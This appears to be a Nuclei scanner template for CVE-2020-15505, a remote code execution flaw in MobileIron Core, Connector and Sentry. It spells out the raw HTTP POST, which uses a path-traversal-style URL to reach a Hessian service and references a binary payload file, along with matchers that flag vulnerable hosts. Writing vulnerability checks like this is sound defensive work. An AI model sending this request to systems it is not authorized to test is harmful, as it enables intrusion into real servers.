28 lines
637 B
YAML
28 lines
637 B
YAML
|
id: CVE-2020-15505
|
||
|
|
||
|
info:
|
||
|
name: MobileIron Core & Connector <= v10.6, Sentry <= v9.8 - RCE
|
||
|
author: dwisiswant0
|
||
|
severity: critical
|
||
|
|
||
|
requests:
|
||
|
- payloads:
|
||
|
data: "payloads/CVE-2020-15505.bin"
|
||
|
raw:
|
||
|
- |
|
||
|
POST /mifs/.;/services/LogService HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Referer: https://{{Hostname}}
|
||
|
Content-Type: x-application/hessian
|
||
|
Connection: close
|
||
|
|
||
|
{{hex_decode('630200480004')}}data
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "application/x-hessian"
|
||
|
part: header
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|